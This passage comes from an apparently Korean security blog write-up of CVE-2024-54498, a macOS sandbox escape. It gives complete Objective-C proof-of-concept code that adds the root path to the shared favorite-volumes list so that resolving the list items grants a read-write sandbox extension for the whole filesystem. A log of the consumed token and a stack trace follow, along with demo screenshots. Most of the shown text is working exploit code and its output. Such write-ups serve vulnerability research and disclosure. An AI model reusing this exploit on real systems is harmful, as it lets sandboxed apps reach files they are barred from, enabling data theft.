https:\/\/github.com\/wh1te4ever\/CVE-2024-54498-PoC<\/a><\/p>\n\n\n\nint add_root_dir_to_favorites(void) {\n CFStringRef listType = kLSSharedFileListFavoriteVolumes; \n LSSharedFileListRef favoriteVolumesList = LSSharedFileListCreate(NULL, listType, NULL);\n \n if (favoriteVolumesList) {\n NSString *path = @\"\/\";\n CFURLRef tmpDirURL = (__bridge CFURLRef)[NSURL fileURLWithPath:path];\n \n \/\/ Favorite Volumes\uc5d0 \ucd94\uac00\n LSSharedFileListItemRef newItem = LSSharedFileListInsertItemURL(\n favoriteVolumesList,\n kLSSharedFileListItemLast,\n NULL,\n NULL,\n tmpDirURL,\n NULL,\n NULL\n );\n \n if (newItem) {\n NSLog(@\"[+] Successfully added %@ to Favorite Volumes.\", path);\n CFRelease(newItem);\n } else {\n NSLog(@\"[-] Failed to add %@ to Favorite Volumes.\", path);\n }\n \n CFRelease(favoriteVolumesList);\n } else {\n NSLog(@\"[-] Failed to access LSSharedFileList for Favorite Volumes.\");\n }\n \n return 0;\n}\n\nint remove_root_dir_from_favorites(void) {\n UInt32 seedValue;\n \n LSSharedFileListRef favoriteVolsRef = LSSharedFileListCreate(NULL, kLSSharedFileListFavoriteVolumes, NULL);\n if (!favoriteVolsRef) {\n NSLog(@\"[-] Failed to access favorite items list.\");\n return 0;\n }\n\n CFArrayRef favoriteVols = LSSharedFileListCopySnapshot(favoriteVolsRef, &seedValue);\n CFIndex arrayCount = CFArrayGetCount(favoriteVols);\n \n for (CFIndex i = 0; i < arrayCount; ++i) {\n CFURLRef urlRef;\n LSSharedFileListItemRef itemRef = (LSSharedFileListItemRef)CFArrayGetValueAtIndex(favoriteVols, i);\n OSStatus status = LSSharedFileListItemResolve(itemRef, 0, &urlRef, NULL);\n\n if (status != noErr) {\n continue;\n }\n \n NSURL *theURL = (__bridge NSURL*) urlRef;\n NSString *checkPath = [theURL path];\n \n if ([checkPath isEqualToString:@\"\/\"]) {\n LSSharedFileListItemRemove(favoriteVolsRef, itemRef);\n NSLog(@\"[+] Successfully removed root directory (\/) from favorite volumes.\");\n }\n \n CFRelease(urlRef);\n }\n \n CFRelease(favoriteVols);\n CFRelease(favoriteVolsRef);\n \n return 0;\n}\n\nint trigger_exploit(void) {\n LSSharedFileListRef recentItems = LSSharedFileListCreate(NULL, kLSSharedFileListFavoriteVolumes, NULL);\n if (recentItems) {\n NSArray *items = (__bridge NSArray *)LSSharedFileListCopySnapshot(recentItems, NULL);\n \n NSLog(@\"items array: %@\\\\n\", items);\n for (id item in items) {\n \n LSSharedFileListItemRef itemRef = (__bridge LSSharedFileListItemRef)item;\n CFErrorRef errorRef;\n CFURLRef itemURL = LSSharedFileListItemCopyResolvedURL(itemRef, 0, &errorRef);\n NSString *itemPath = [(__bridge NSURL *)itemURL path];\n NSLog(@\"itemPath: %@\", itemPath);\n }\n CFRelease(recentItems);\n } else {\n NSLog(@\"Failed to retrieve recent items.\");\n }\n \n return 0;\n}\n\nint main(void) {\n \/\/Exploit...\n add_root_dir_to_favorites();\n \n trigger_exploit();\n \n remove_root_dir_from_favorites();\n}\n\n<\/pre>\n\n\n\n\ubd81\ub9c8\ud06c\uc5d0 \u201c\/\u201d \ub8e8\ud2b8 \uacbd\ub85c\ub97c \ucd94\uac00\ud558\ub294\ub370, \uc885\ub958\ub97c kLSSharedFileListFavoriteVolumes\uc73c\ub85c \uc815\ud574\uc57c \ud55c\ub2e4.<\/p>\n\n\n\n
\uadf8\ub807\uac8c \ud574\uc57c -[ConnectedProcess shouldExtendSandboxForListIdentifier:] \uba54\uc18c\ub4dc\uac00 1\uc744 \ubc18\ud658\ud558\uc5ec, 0x40000000LL \uac12\uc744 OR \uc5f0\uc0b0\uc790\ub85c \uc138\ud2b8\ub418\uc5b4, \ucd94\ud6c4\uc5d0 sandbox_extension_issue_file \ud568\uc218\ub97c \ud638\ucd9c\uc2dc\ud0ac \uc218 \uc788\uae30 \ub54c\ubb38\uc774\ub2e4.<\/p>\n\n\n\n
\uc774\uc81c LSSharedFileListItemResolve \ud568\uc218\ub97c \ud638\ucd9c\uc2dc\ud0a4\uba74 \ubd81\ub9c8\ud06c \ub9ac\uc2a4\ud2b8\ub97c \uac00\uc838\uc624\uba74\uc11c \u201c\/\u201d, \uc989 \uc804\uccb4 \uacbd\ub85c\uc5d0 \ub300\ud55c \uc0cc\ub4dc\ubc15\uc2a4 \ud1a0\ud070\uc744 \ubc1c\uae09\ubc1b\uc544 sandbox_extension_consume \ud568\uc218\ub97c \ud638\ucd9c\ud558\ub294 \uac83\uc744 \ud655\uc778\ud560 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n
2025-01-09 20:59:24.855 CVE-2024-54498[648:5371] [+] Called sandbox_extension_consume, ret = 2, extension_token = 228a2474e63a51fb2053ff7e315c4cda08003499b72ff3d769482d5d67a94df2;00;00000000;00000000;00000000;0000000000000020;com.apple.app-sandbox.read-write;01;01000013;0000000000000002;02;\/\n2025-01-09 20:59:24.858 CVE-2024-54498[648:5371] [+] sandbox_extension_consume trace: (\n 0 CVE-2024-54498 0x0000000102caea68 hook_sandbox_extension_consume + 84\n 1 CoreServicesInternal 0x00000001945717fc _ZN21SandboxExtensionCache8_consumeEPK10__CFStringPK8__CFDataPS5_ + 204\n 2 CoreServicesInternal 0x00000001945716a0 _ZN21SandboxExtensionCache7consumeEPK7__CFURLPK8__CFData + 104\n 3 CoreServicesInternal 0x000000019456e738 _FSURLStartAccessingSecurityScopedResource + 84\n 4 CoreFoundation 0x0000000190c91cf8 CFURLStartAccessingSecurityScopedResource + 16\n 5 CoreFoundation 0x0000000190c91cbc -[NSURL startAccessingSecurityScopedResource] + 68\n 6 SharedFileList 0x0000000199d55174 __47-[_SFLItemWrapper initWithItem:listIdentifier:]_block_invoke + 332\n 7 SharedFileList 0x0000000199d54c84 -[SFLBookmark resolveWithOptions:relativeToURL:error:] + 128\n 8 SharedFileList 0x0000000199d54ac8 +[SFLList(LSSharedFileListSupport) resolveItem:resolutionFlags:error:] + 84\n 9 SharedFileList 0x0000000199d60e64 LSSharedFileListItemCopyResolvedURL + 144\n 10 CVE-2024-54498 0x0000000102cae45c trigger_exploit + 336\n 11 CVE-2024-54498 0x0000000102cae8a4 -[ViewController exploitButton:] + 268\n 12 AppKit 0x00000001948ec87c -[NSApplication(NSResponder) sendAction:to:from:] + 460\n 13 AppKit 0x00000001948ec680 -[NSControl sendAction:to:] + 72\n 14 AppKit 0x00000001948ec5c4 __26-[NSCell _sendActionFrom:]_block_invoke + 100\n 15 AppKit 0x00000001948ec4ec -[NSCell _sendActionFrom:] + 204\n 16 AppKit 0x00000001948ec3e8 -[NSButtonCell _sendActionFrom:] + 96\n 17 AppKit 0x00000001948e9970 NSControlTrackMouse + 1480\n 18 AppKit 0x00000001948e937c -[NSCell trackMouse:inRect:ofView:untilMouseUp:] + 144\n 19 AppKit 0x00000001948e91f4 -[NSButtonCell trackMouse:inRect:ofView:untilMouseUp:] + 580\n 20 AppKit 0x00000001948e8678 -[NSControl mouseDown:] + 448\n 21 AppKit 0x00000001948e7518 -[NSWindow(NSEventRouting) _handleMouseDownEvent:isDelayedEvent:] + 3672\n 22 AppKit 0x000000019487300c -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 384\n 23 AppKit 0x0000000194872cbc -[NSWindow(NSEventRouting) sendEvent:] + 284\n 24 AppKit 0x000000019508abf0 -[NSApplication(NSEventRouting) sendEvent:] + 1656\n 25 AppKit 0x0000000194c9889c -[NSApplication _handleEvent:] + 60\n 26 AppKit 0x000000019473eb08 -[NSApplication run] + 520\n 27 AppKit 0x0000000194715364 NSApplicationMain + 888\n 28 CVE-2024-54498 0x0000000102cadf78 main + 44\n 29 dyld 0x00000001907b8274 start + 2840\n)\n\n<\/pre>\n\n\n\n![\"image10.png\"\/](\"attachment:c46eb99c-c7b2-41f9-b2e0-73c7883416b6:image10.png\")
<\/figure>\n\n\n\nDemo<\/h2>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image-1-1.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image-2.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image3-1024x80.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image4-1024x401.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image5-1024x456.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image6-1024x76.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image7-1024x260.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image8-1024x518.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/06\/image9-1024x73.png\")
<\/figure>\n\n\n\n